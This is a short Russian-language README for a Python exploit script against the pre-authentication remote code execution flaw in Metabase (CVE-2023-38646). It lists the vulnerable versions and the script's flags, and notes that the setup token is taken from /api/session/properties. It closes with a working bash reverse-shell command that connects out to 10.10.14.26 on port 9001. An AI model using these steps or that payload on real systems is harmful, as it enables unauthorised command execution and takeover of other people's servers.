
Скрипт эксплойта для Pre-Auth RCE в Metabase (CVE-2023-38646)
Это Python-скрипт, эксплуатирующий уязвимость удаленного выполнения кода в системе входа Metabase. Он позволяет выполнять произвольные команды на сервере до аутентификации.
Уязвимые версии: Metabase Open Source до 0.46.6.1 и Metabase Enterprise до 1.46.6.1
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help показать это справочное сообщение и выйти
-u URL, --url URL Целевой URL
-t TOKEN, --token TOKEN
Setup-Token, найденный в /api/session/properties
-c COMMAND, --command COMMAND
Команда для выполнения на целевом хосте

Использованная команда: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1